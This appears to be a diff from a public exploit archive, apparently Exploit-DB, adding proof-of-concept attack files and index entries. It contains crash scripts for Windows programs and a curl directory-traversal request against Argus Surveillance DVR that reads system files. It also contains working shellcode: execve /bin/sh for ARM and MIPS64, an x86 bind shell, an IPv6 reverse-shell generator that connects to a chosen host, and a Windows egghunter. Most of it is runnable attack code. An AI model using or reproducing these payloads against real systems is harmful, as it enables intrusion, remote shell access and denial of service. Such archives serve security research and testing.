+# Author: Gionathan "John" Reale
+# Discovey Date: 2018-08-29
+# Homepage: https://www.hdtune.com/
+# Software Link: https://www.hdtune.com/download.html
+# Tested Version: v1.10
+# Tested on OS: Windows 7 32-bit
+# Steps to Reproduce: Run the python exploit script, it will create a new 
+# file with the name "exploit.txt". Copy the content of the new file "exploit.txt". 
+# Now start the program. Now in the field named: "Name" paste the "exploit.txt" content copied eariler.
+# Click "Register" and see a crash!  
+
+#!/usr/bin/python
+   
+buffer = "A" * 6000
+
+payload = buffer
+try:
+    f=open("exploit.txt","w")
+    print "[+] Creating %s bytes evil payload.." %len(payload)
+    f.write(payload)
+    f.close()
+    print "[+] File created!"
+except:
+    print "File cannot be created"

exploits/windows_x86/dos/45300.py

@@ -0,0 +1,25 @@
+# Exploit Title: Easy PhotoResQ 1.0 - Denial Of Service (PoC)
+# Author: Gionathan "John" Reale
+# Discovey Date: 2018-08-29
+# Homepage: https://www.hdtune.com/
+# Software Link: https://www.hdtune.com/download.html
+# Tested Version: v1.0
+# Tested on OS: Windows 7 32-bit
+# Steps to Reproduce: Run the python exploit script, it will create a new 
+# file with the name "exploit.txt". Copy the content of the new file "exploit.txt". 
+# Now start the program. Now when you are inside of the program click "File" > "Options". In the field: "Folder / filename" paste the copied content from "exploit.txt". 
+# Now click "OK" and see a crash!  
+
+#!/usr/bin/python
+   
+buffer = "A" * 6000
+
+payload = buffer
+try:
+    f=open("exploit.txt","w")
+    print "[+] Creating %s bytes evil payload.." %len(payload)
+    f.write(payload)
+    f.close()
+    print "[+] File created!"
+except:
+    print "File cannot be created"

exploits/windows_x86/webapps/45296.txt

@@ -0,0 +1,26 @@
+# Exploit: Argus Surveillance DVR 4.0.0.0 - Directory Traversal
+# Author: John Page (aka hyp3rlinx)
+# Date: 2018-08-28
+# Vendor: www.argussurveillance.com
+# Software Link: http://www.argussurveillance.com/download/DVR_stp.exe
+# CVE: N/A
+
+# Description:
+# Argus Surveillance DVR 4.0.0.0 devices allow Unauthenticated Directory Traversal, 
+# leading to File Disclosure via a ..%2F in the WEBACCOUNT.CGI RESULTPAGE parameter.
+
+# PoC
+
+curl "http://VICTIM-IP:8080/WEBACCOUNT.CGI?OkBtn=++Ok++&RESULTPAGE=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2FWindows%2Fsystem.ini&USEREDIRECT=1&WEBACCOUNTID=&WEBACCOUNTPASSWORD="
+
+# Result:
+
+; for 16-bit app support
+woafont=dosapp.fon
+EGA80WOA.FON=EGA80WOA.FON
+EGA40WOA.FON=EGA40WOA.FON
+CGA80WOA.FON=CGA80WOA.FON
+CGA40WOA.FON=CGA40WOA.FON
+ 
+wave=mmdrv.dll
+timer=timer.drv

files_exploits.csv

@@ -6074,6 +6074,16 @@ id,file,description,date,author,type,platform,port
 45275,exploits/windows/dos/45275.py,"Cisco Network Assistant 6.3.3 - 'Cisco Login' Denial of Service (PoC)",2018-08-28,"Luis Martínez",dos,windows,
 45277,exploits/windows_x86-64/dos/45277.py,"Instagram App 41.1788.50991.0 - Denial of Service (PoC)",2018-08-28,"Ali Alipour",dos,windows_x86-64,
 45279,exploits/windows/dos/45279.html,"Microsoft Windows - JScript RegExp.lastIndex Use-After-Free",2018-08-28,"Google Security Research",dos,windows,
+45281,exploits/windows_x86-64/dos/45281.py,"NASA openVSP 3.16.1 - Denial of Service (PoC)",2018-08-29,L0RD,dos,windows_x86-64,
+45282,exploits/windows_x86/dos/45282.py,"Immunity Debugger 1.85 - Denial of Service (PoC)",2018-08-29,"Gionathan Reale",dos,windows_x86,
+45285,exploits/windows_x86/dos/45285.py,"ipPulse 1.92 - 'TCP Port' Denial of Service (PoC)",2018-08-29,"Diego Santamaria",dos,windows_x86,
+45294,exploits/windows_x86/dos/45294.py,"Fathom 2.4 - Denial Of Service (PoC)",2018-08-29,"Gionathan Reale",dos,windows_x86,
+45295,exploits/windows_x86-64/dos/45295.py,"Skype Empresarial Office 365 16.0.10730.20053 - 'Dirección de inicio de sesión' Denial of service (PoC)",2018-08-29,"Samuel Cruz",dos,windows_x86-64,
+45297,exploits/ios/dos/45297.py,"Cisco AnyConnect Secure Mobility Client 4.6.01099 - 'Introducir URL' Denial of Service (PoC)",2018-08-29,"Luis Martínez",dos,ios,
+45298,exploits/windows_x86/dos/45298.py,"HD Tune Pro 5.70 - Denial of Service (PoC)",2018-08-29,"Gionathan Reale",dos,windows_x86,
+45299,exploits/windows_x86/dos/45299.py,"Drive Power Manager 1.10 - Denial Of Service (PoC)",2018-08-29,"Gionathan Reale",dos,windows_x86,
+45300,exploits/windows_x86/dos/45300.py,"Easy PhotoResQ 1.0 - Denial Of Service (PoC)",2018-08-29,"Gionathan Reale",dos,windows_x86,
+45301,exploits/windows_x86-64/dos/45301.py,"Trillian 6.1 Build 16 - _Sign In_ Denial of service (PoC)",2018-08-29,"Jose Miguel Gonzalez",dos,windows_x86-64,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -9912,6 +9922,8 @@ id,file,description,date,author,type,platform,port
 45269,exploits/windows/local/45269.rb,"Foxit PDF Reader 9.0.1.1049 - Pointer Overwrite Use-After-Free (Metasploit)",2018-08-27,Metasploit,local,windows,
 45278,exploits/windows_x86-64/local/45278.py,"UltraISO 9.7.1.3519 - Buffer Overflow (SEH)",2018-08-28,"Shubham Singh",local,windows_x86-64,
 45280,exploits/windows/local/45280.txt,"Microsoft Windows - Advanced Local Procedure Call (ALPC) Local Privilege Escalation",2018-08-28,SandboxEscaper,local,windows,
+45288,exploits/linux/local/45288.py,"SIPP 3.3 - Stack-Based Buffer Overflow",2018-08-29,"Juan Sacco",local,linux,
+45289,exploits/windows/local/45289.py,"R 3.4.4 - Buffer Overflow (SEH)",2018-08-29,ZwX,local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -16738,6 +16750,7 @@ id,file,description,date,author,type,platform,port
 45265,exploits/linux/remote/45265.js,"Node.JS - 'node-serialize' Remote Code Execution",2017-02-08,OpSecX,remote,linux,
 45272,exploits/multiple/remote/45272.txt,"Electron WebPreferences - Remote Code Execution",2018-08-27,"Matt Austin",remote,multiple,
 45273,exploits/unix/remote/45273.rb,"HP Jetdirect - Path Traversal Arbitrary Code Execution (Metasploit)",2018-08-27,Metasploit,remote,unix,
+45283,exploits/hardware/remote/45283.rb,"Eaton Xpert Meter 13.4.0.10 - SSH Private Key Disclosure",2018-08-29,BrianWGray,remote,hardware,
 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -39879,3 +39892,6 @@ id,file,description,date,author,type,platform,port
 45270,exploits/hardware/webapps/45270.txt,"Seagate Personal Cloud SRN21C 4.3.16.0 / 4.3.18.0 - SQL Injection",2018-08-27,"Yorick Koster",webapps,hardware,
 45271,exploits/php/webapps/45271.txt,"Responsive FileManager < 9.13.4 - Directory Traversal",2018-08-27,"Simon Uvarov",webapps,php,80
 45274,exploits/php/webapps/45274.html,"WordPress Plugin Plainview Activity Monitor 20161228 - (Authenticated) Command Injection",2018-08-27,"Lydéric Lefebvre",webapps,php,80
+45284,exploits/php/webapps/45284.txt,"phpMyAdmin 4.7.x - Cross-Site Request Forgery",2018-08-29,VulnSpy,webapps,php,80
+45286,exploits/hardware/webapps/45286.py,"Episerver 7 patch 4 - XML External Entity Injection",2018-08-29,"Jonas Lejon",webapps,hardware,
+45296,exploits/windows_x86/webapps/45296.txt,"Argus Surveillance DVR 4.0.0.0 - Directory Traversal",2018-08-29,hyp3rlinx,webapps,windows_x86,

files_shellcodes.csv

@@ -901,3 +901,8 @@ id,file,description,date,author,type,platform
 45139,shellcodes/linux_x86/45139.c,"Linux/x86 - Reverse TCP (::FFFF:192.168.1.5:4444/TCP) Shell (/bin/sh) + Null-Free + IPv6 Shellcode (86 bytes)",2018-08-03,"Kartik Durg",shellcode,linux_x86
 45144,shellcodes/arm/45144.c,"Linux/ARM - Bind (4444/TCP) Shell (/bin/sh) + IPv6 Shellcode (128 Bytes)",2018-08-03,"Ken Kitahara",shellcode,arm
 45185,shellcodes/linux_x86-64/45185.asm,"Linux/x64 - Add Root User (toor/toor) Shellcode (99 bytes)",2018-08-13,epi,shellcode,linux_x86-64
+45287,shellcodes/linux_mips/45287.c,"Linux/MIPS64 - execve(/bin/sh) Shellcode (48 bytes)",2018-08-29,antonio,shellcode,linux_mips
+45290,shellcodes/arm/45290.c,"Linux/ARM - execve(_/bin/sh__ [_/bin/sh_]_ NULL) Shellcode (32 Bytes)",2018-08-29,"Ken Kitahara",shellcode,arm
+45291,shellcodes/linux_x86/45291.c,"Linux/x86 - Dual Network Stack (IPv4 and IPv6) Bind TCP Shellcode",2018-08-29,"Kevin Kirsche",shellcode,linux_x86
+45292,shellcodes/linux_x86/45292.py,"Linux/x86 - IPv6 Reverse TCP Shellcode Generator (94 bytes)",2018-08-29,"Kevin Kirsche",shellcode,linux_x86
+45293,shellcodes/windows_x86-64/45293.c,"Windows/x64 (10) - WoW64 Egghunter Shellcode (50 bytes)",2018-08-29,n30m1nd,shellcode,windows_x86-64

shellcodes/arm/45290.c

@@ -0,0 +1,63 @@
+/*
+Title:  Linux/ARM - execve("/bin/sh", ["/bin/sh"], NULL) Shellcode (32 Bytes)
+Date:   2018-08-16
+Tested: armv7l (Raspberry Pi 3 Model B+)
+Author: Ken Kitahara
+
+pi@raspberrypi:~ $ uname -a
+Linux raspberrypi 4.14.52-v7+ #1123 SMP Wed Jun 27 17:35:49 BST 2018 armv7l GNU/Linux
+pi@raspberrypi:~ $ lsb_release -a
+No LSB modules are available.
+Distributor ID:	Raspbian
+Description:	Raspbian GNU/Linux 9.4 (stretch)
+Release:	9.4
+Codename:	stretch
+pi@raspberrypi:~ $ cat binsh.s
+.section .text
+.global _start
+
+_start:
+    .ARM
+    add  r3, pc, #1
+    bx   r3
+
+    .THUMB
+    // execve("/bin/sh", ["/bin/sh"], NULL)
+    adr  r0, spawn
+    eor  r2, r2, r2
+    strb r2, [r0, #7]
+    push {r0, r2}
+    mov  r1, sp
+    mov  r7, #11
+    svc  #1
+
+    // adjust address
+    eor  r7, r7, r7
+
+spawn:
+.ascii "/bin/shA"
+
+pi@raspberrypi:~ $ as -o binsh.o binsh.s && ld -N -o binsh binsh.o
+pi@raspberrypi:~ $ objcopy -O binary binsh binsh.bin
+pi@raspberrypi:~ $ hexdump -v -e '"\\""x" 1/1 "%02x" ""' binsh.bin
+\x01\x30\x8f\xe2\x13\xff\x2f\xe1\x03\xa0\x52\x40\xc2\x71\x05\xb4\x69\x46\x0b\x27\x01\xdf\x7f\x40\x2f\x62\x69\x6e\x2f\x73\x68\x41
+
+*/
+
+#include<stdio.h>
+#include<string.h>
+
+unsigned char sc[] = \
+"\x01\x30\x8f\xe2\x13\xff\x2f\xe1"
+"\x03\xa0\x52\x40\xc2\x71\x05\xb4"
+"\x69\x46\x0b\x27\x01\xdf\x7f\x40"
+"\x2f\x62\x69\x6e\x2f\x73\x68\x41";
+
+void main()
+{
+    printf("Shellcode Length: %d\n", strlen(sc));
+
+    int (*ret)() = (int(*)())sc;
+
+    ret();
+}

shellcodes/linux_mips/45287.c

@@ -0,0 +1,56 @@
+/* Title: Linux/MIPS64 - execve(/bin/sh) Shellcode (48 bytes)
+ * Date: 2018-08-10
+ * Author: Antonio
+ * 
+ * [*] execve(/bin/sh) shellcode for MIPS64
+ * [*] tested on MIPS Malta - Linux debian-mips64el 4.9.0-3-5kc-malta 
+ * [*] 48 bytes
+ *
+ * gcc -fno-stack-protector -z execstack main.c -o main -g
+ *
+ * adp, SLAE - 1326, 2018.
+ */
+
+#include <stdio.h>
+#include <string.h>
+
+/*
+.text
+        .global __start
+__start:
+        dli     $t0,0x69622f2f 
+        sw      $t0,-12($sp)
+        dli     $t1,0x68732f6e
+        sw      $t1,-8($sp)
+        sw      $zero,-4($sp)
+        daddiu $a0,$sp,-12
+        slti    $a1,$zero,-1   
+        slti    $a2,$zero,-1
+        dli      $v0,     5057
+        syscall   0x40404
+.align 8
+*/
+
+unsigned char shellcode[] = 
+      "\x62\x69\x0c\x3c"
+      "\x2f\x2f\x8c\x35"
+      "\xf4\xff\xac\xaf"
+      "\x73\x68\x0d\x3c"
+      "\x6e\x2f\xad\x35"
+      "\xf8\xff\xad\xaf"
+      "\xfc\xff\xa0\xaf"
+      "\xf4\xff\xa4\x67"
+      "\xff\xff\x05\x28"
+      "\xff\xff\x06\x28"
+      "\xc1\x13\x02\x24"
+      "\x0c\x01\x01\x01";
+
+int main(int argc, char ** argv)
+{
+        void (*s) (void);
+
+        printf("Shellshellcode Length:  %d\n", strlen(shellcode));
+
+        s = shellcode;
+        s();
+}

shellcodes/linux_x86/45291.c

@@ -0,0 +1,178 @@
+/*
+# Exploit Title: Linux x86 Dual Network Stack (IPv4 and IPv6) Bind TCP Shellcode
+# Date: 2018-08-18
+# Shellcode Author: Kevin Kirsche
+# Shellcode Repository: https://github.com/kkirsche/SLAE/tree/master/assignment_1-bind_shell
+# Tested on: Shell on Ubuntu 18.04 with gcc 7.3.0 / Connected from Kali 2018.2
+
+# This shellcode will listen on port 1337 on all of the host's IPv4 and IPv6 addresses and give you /bin/sh
+
+This shellcode has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:
+http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert/
+Student ID: SLAE-1134
+
+Compilation instructions:
+	gcc -o shellcode shellcode.c -fno-stack-protector -z execstack
+
+Commented NASM:
+global _start
+
+section .text
+
+_start:
+  ; socket
+  ;; cleanup
+  xor ebx, ebx
+  ;; arguments
+  push ebx        ; #define IP_PROTO 0
+  push 0x1        ; #define SOCK_STREAM 1
+  push 0xa        ; #define PF_INET6 10
+  ;; function
+  mov ecx, esp    ; pointer to args on the stack into ecx
+  push 0x66
+  pop eax         ; socketcall 0x66 == 102
+  inc ebx         ; #define SYS_SOCKET 1
+  ;; call
+  int 0x80
+  ;; returned data
+  xchg esi, eax   ; sockfd eax -> esi
+
+  ; setsocketopt
+  ;; cleanup
+  xor eax, eax
+  ;; arguments
+  push eax        ; NO = 0x0
+  mov edx, esp    ; get a pointer to the null value
+  push 0x2        ; sizeof(NO)
+  push edx        ; pointer to NO
+  push 0x1a       ; #define IPV6_V6ONLY 26
+  push 0x29       ; #define IPPROTO_IPV6
+  ;; function
+  mov ecx, esp    ; pointer to args on the stack into ecx
+  mov al, 0x66    ; socketcall 0x66 == 102
+  mov bl, 0xe     ; #define SYS_SETSOCKOPT 14
+  ;; call
+  int 0x80
+
+  ; bind ipv4
+  ;; cleanup
+  xor edx, edx
+  ;; v4lhost struct
+  push edx          ; #define INADDR_ANY 0
+  push word 0x3905  ; port 1337 in big endian format
+  push 0x2          ; #define AF_INET 2
+  ;; arguments
+  mov ecx, esp      ; pointer to v4lhost struct arguments
+  push 0x10         ; sizeof v4lhost
+  push ecx          ; pointer v4lhost
+  push esi          ; push sockfd onto stack
+  ;; function
+  mov ecx, esp      ; argument pointer into ecx
+  mov bl, 0x2       ; #define SYS_BIND 2
+  mov al, 0x66      ; socketcall 0x66 == 102
+  ;; call
+  int 0x80
+
+  ; bind ipv6
+  ;; cleanup
+  xor eax, eax
+  ;; v6lhost struct
+  push dword eax    ; v6_host.sin6_addr
+  push dword eax
+  push dword eax
+  push dword eax
+  push dword eax
+  push word 0x3905  ; port 1337
+  push word 0x0a    ; PF_INET6
+  ;; arguments
+  mov ecx, esp      ; pointer to struct into ecx
+  push 0x1c         ; sizeof struct
+  push ecx          ; pointer to struct
+  push esi          ; sockfd
+  ;; function
+  mov ecx, esp      ; arguments into register
+  mov bl, 0x2       ; #define SYS_BIND 2
+  mov al, 0x66      ; socketcall 0x66 == 102
+  ;; call
+  int 0x80
+
+  ; listen
+  ;; arguments
+  push byte 0x2     ; queuelimit = 2
+  push esi          ; sockfd
+  ;; function
+  mov ecx, esp      ; pointer to args into ecx
+  mov bl, 0x4       ; #define SYS_LISTEN 4
+  mov al, 0x66      ; socketcall 0x66 == 102
+  ;; call
+  int 0x80
+
+  ; accept
+  ;; cleanup
+  xor ebx, ebx
+  ;;arguments
+  push ebx          ; push NULL
+  push ebx          ; push NULL
+  push esi          ; sockfd
+  ;; function
+  mov ecx, esp      ; pointer to args into ecx
+  mov bl, 0x5       ; #define SYS_ACCEPT 5
+  mov al, 0x66      ; socketcall 0x66 == 102
+  ;; call
+  int 0x80
+  ;; returned data
+  xchg ebx, eax     ; ebx holds the new sockfd that we accepted
+
+  ; dup file descriptor
+  ;; setup counters
+  sub ecx, ecx      ; zero out ecx
+  mov cl, 0x2       ; create a counter
+  ;; loop
+duploop:
+  mov al, 0x3f      ; SYS_DUP2 syscall
+  int 0x80          ; call SYS_DUP2
+  dec ecx           ; decrement loop counter
+  jns duploop       ; as long as SF is not set, keep looping
+
+  ; execve
+  ;; cleanup
+  xor edx, edx
+  ;; command to run
+  push edx          ; NULL string terminator
+  push 0x68732f2f   ; hs//
+  push 0x6e69622f   ; nib/
+  ;; arguments
+  mov ebx, esp      ; pointer to args into ebx
+  push edx          ; null ARGV
+  push ebx          ; command to run
+  ;; function
+  mov ecx, esp
+  mov al, 0x0b      ; execve systemcall
+  int 0x80
+*/
+#include <stdio.h>
+#include <string.h>
+
+unsigned char code[] = "\x31\xdb\x53\x6a\x01\x6a\x0a\x89\xe1\x6a\x66\x58\x43"
+  "\xcd\x80\x96\x31\xc0\x50\x89\xe2\x6a\x02\x52\x6a\x1a\x6a\x29\x89\xe1\xb0"
+  "\x66\xb3\x0e\xcd\x80\x31\xd2\x52\x66\x68\x05\x39\x6a\x02\x89\xe1\x6a\x10"
+  "\x51\x56\x89\xe1\xb3\x02\xb0\x66\xcd\x80\x31\xc0\x50\x50\x50\x50\x50\x66"
+  "\x68\x05\x39\x66\x6a\x0a\x89\xe1\x6a\x1c\x51\x56\x89\xe1\xb3\x02\xb0\x66"
+  "\xcd\x80\x6a\x02\x56\x89\xe1\xb3\x04\xb0\x66\xcd\x80\x31\xdb\x53\x53\x56"
+  "\x89\xe1\xb3\x05\xb0\x66\xcd\x80\x93\x29\xc9\xb1\x02\xb0\x3f\xcd\x80\x49"
+  "\x79\xf9\x31\xd2\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52"
+  "\x53\x89\xe1\xb0\x0b\xcd\x80";
+
+
+int main() {
+  // pollute the registers
+  asm("mov $0x78975432, %eax\n\t"
+      "mov $0x17645589, %ecx\n\t"
+      "mov $0x23149875, %edx\n\t");
+
+  // begin shellcode
+	printf("Shellcode Length:  %d\n", strlen(code));
+  // execute our shellcode
+	int (*ret)() = (int(*)())code;
+	ret();
+}

shellcodes/linux_x86/45292.py

@@ -0,0 +1,81 @@
+#!/usr/bin/env python3
+# Exploit Title: Linux x86 IPv6 Reverse TCP Shellcode Generator (94 bytes)
+# Date: 2018-08-26
+# Shellcode Author: Kevin Kirsche
+# Shellcode Repository: https://github.com/kkirsche/SLAE/tree/master/assignment_2-reverse_shell
+# Tested on: Shell on Ubuntu 18.04 with gcc 7.3.0 / Connecting to Kali 2018.2
+
+# This shellcode will connect to fd15:4ba5:5a2b:1002:61b7:23a9:ad3d:5509 on port 1337 and give you /bin/sh
+
+#This shellcode has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:
+#http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert/
+#Student ID: SLAE-1134
+
+from argparse import ArgumentParser
+from ipaddress import ip_address
+import sys
+
+sc = ("\\x31\\xdb\\x53\\x43\\x53\\x6a\\x0a\\x89\\xe1\\x6a\\x66\\x58\\xcd\\x80"
+      "\\x96\\x99\\x52\\x68{ipv6_fourth_octet}\\x68{ipv6_third_octet}\\x68"
+      "{ipv6_second_octet}\\x68{ipv6_first_octet}\\x52\\x66\\x68{port}"
+      "\\x66\\x6a\\x0a\\x89\\xe1\\x6a\\x1c\\x51\\x56\\x89\\xe1\\x43\\x43\\x6a"
+      "\\x66\\x58\\xcd\\x80\\x87\\xde\\x29\\xc9\\xb1\\x02\\xb0\\x3f\\xcd\\x80"
+      "\\x49\\x79\\xf9\\x31\\xd2\\x52\\x68\\x2f\\x2f\\x73\\x68\\x68\\x2f\\x62"
+      "\\x69\\x6e\\x89\\xd1\\x89\\xe3\\xb0\\x0b\\xcd\\x80")
+
+if __name__ == '__main__':
+    parser = ArgumentParser(description=("Dual Network Stack Bind Shell "
+            "Generator"))
+    parser.add_argument('ip_address', type=str, nargs='?', default='fd15:4ba5:5a2b:1002:61b7:23a9:ad3d:5509',
+            help='The IP address to connect to (default fd15:4ba5:5a2b:1002:61b7:23a9:ad3d:5509)')
+    parser.add_argument('port', type=int, nargs='?', default=1337,
+            help='The port to connect to (default 1337)')
+    args = parser.parse_args()
+
+    ip = ip_address(args.ip_address)
+    ip_hex = ip.exploded
+
+    if args.port < 1 or args.port > 65535:
+        print('Invalid port. Please select a port between 1 and 65535')
+        sys.exit(1)
+    
+    port = format(args.port, '04x')
+    port = "\\x{b}\\x{a}".format(
+            a=port[2:4],
+            b=port[0:2]) 
+
+    split_hex_ip = ip_hex.split(':')
+    ipv6_fourth_octet = '\\x{d}\\x{c}\\x{b}\\x{a}'.format(
+            d=split_hex_ip[6][0:2],
+            c=split_hex_ip[6][2:4],
+            b=split_hex_ip[7][0:2],
+            a=split_hex_ip[7][2:4])
+    ipv6_third_octet = '\\x{d}\\x{c}\\x{b}\\x{a}'.format(
+            d=split_hex_ip[4][0:2],
+            c=split_hex_ip[4][2:4],
+            b=split_hex_ip[5][0:2],
+            a=split_hex_ip[5][2:4])
+    ipv6_second_octet = '\\x{d}\\x{c}\\x{b}\\x{a}'.format(
+            d=split_hex_ip[2][0:2],
+            c=split_hex_ip[2][2:4],
+            b=split_hex_ip[3][0:2],
+            a=split_hex_ip[3][2:4])
+    ipv6_first_octet = '\\x{d}\\x{c}\\x{b}\\x{a}'.format(
+            d=split_hex_ip[0][0:2],
+            c=split_hex_ip[0][2:4],
+            b=split_hex_ip[1][0:2],
+            a=split_hex_ip[1][2:4])
+
+    if '\\x00' in port:
+        print('[!] Warning: The port you chose contains a null value.')
+    if (('\\x00' in ipv6_fourth_octet) or ('\\x00' in ipv6_third_octet) or
+            ('\\x00' in ipv6_second_octet) or ('\\x00' in ipv6_first_octet)):
+        print('[!] Warning: The IP address you chose contains a null value.')
+
+    print('Shellcode:')
+    print(sc.format(
+        ipv6_first_octet=str(ipv6_first_octet),
+        ipv6_second_octet=str(ipv6_second_octet),
+        ipv6_third_octet=str(ipv6_third_octet),
+        ipv6_fourth_octet=str(ipv6_fourth_octet),
+        port=str(port)))

shellcodes/windows_x86-64/45293.c

@@ -0,0 +1,88 @@
+#include <Windows.h>
+#include <string.h>
+#include <stdio.h>
+#include <stdlib.h>
+using namespace std;
+
+/*
+
+Title: WoW64Egghunter for Windows 10 (32bit apps on 64bit Windows 10)
+Size: 50 bytes
+Date: 26/08/2018
+Author: n30m1nd - https://www.exploit-db.com/author/?a=8766
+Works in: 32 bit processes on a 64 bit Windows 10 OS
+How to: Compile under Visual Studio and run
+
+Credit where credit is due:
+- https://www.corelan.be/index.php/2011/11/18/wow64-egghunter/
+- https://j00ru.vexillium.org/syscalls/nt/64/
+- https://www.exploit-db.com/exploits/41827/
+- https://web.archive.org/web/20101215052055/http://vx.netlux.org/lib/vrg02.html
+
+Shouts out to the Plakkers!
+
+// Assembly
+
+0:  8c cb                   mov    ebx,cs
+2:  80 fb 23                cmp    bl,0x23
+5:  33 d2                   xor    edx,edx
+7:  66 81 ca ff 0f          or     dx,0xfff
+c:  33 db                   xor    ebx,ebx
+e:  42                      inc    edx
+f:  52                      push   edx
+10: 53                      push   ebx
+11: 53                      push   ebx
+12: 53                      push   ebx
+13: 6a 29                   push   0x29
+15: 58                      pop    eax
+16: b3 c0                   mov    bl,0xc0 ; Heaven's gate
+18: 64 ff 13                call   DWORD PTR fs:[ebx]
+1b: 83 c4 0c                add    esp,0xc
+1e: 5a                      pop    edx
+1f: 3c 05                   cmp    al,0x5
+21: 74 e4                   je     0x7
+23: b8 77 30 30 74          mov    eax,0x74303077
+28: 89 d7                   mov    edi,edx
+2a: af                      scas   eax,DWORD PTR es:[edi]
+2b: 75 e1                   jne    0xe
+2d: af                      scas   eax,DWORD PTR es:[edi]
+2e: 75 de                   jne    0xe
+30: ff e7                   jmp    edi
+*/
+
+char n30m1ndhunter[] =
+"\x8C\xCB\x80\xFB\x23\x33\xD2\x66\x81\xCA\xFF\x0F"
+"\x33\xDB\x42\x52\x53\x53\x53\x6A\x29\x58\xB3\xC0"
+"\x64\xFF\x13\x83\xC4\x0C\x5A\x3C\x05\x74\xE4\xB8"
+"\x77\x30\x30\x74\x89\xD7\xAF\x75\xE1\xAF\x75\xDE"
+"\xFF\xE7";
+
+// msfvenom -p windows/exec cmd=calc.exe -f c
+char scode[] = "w00tw00t" // Eggu
+"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30"
+"\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
+"\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52"
+"\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1"
+"\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b"
+"\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03"
+"\x7d\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b"
+"\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24"
+"\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb"
+"\x8d\x5d\x6a\x01\x8d\x85\xb2\x00\x00\x00\x50\x68\x31\x8b\x6f"
+"\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x68\xa6\x95\xbd\x9d\xff\xd5"
+"\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a"
+"\x00\x53\xff\xd5\x63\x61\x6c\x63\x2e\x65\x78\x65\x00";
+
+int main(int argc, char **argv)
+{
+	// Place the eggu (w00tw00t) in memory and make the shellcode executable
+	void *eggfind = VirtualAlloc(0, sizeof scode, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
+	memcpy(eggfind, scode, sizeof scode);
+
+	// Place the egghunter shellcode in memory and ...
+	void *exec = VirtualAlloc(0, sizeof n30m1ndhunter, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
+	memcpy(exec, n30m1ndhunter, sizeof n30m1ndhunter);
+	
+	// ... jump to it
+	((void(*)())exec)();
+}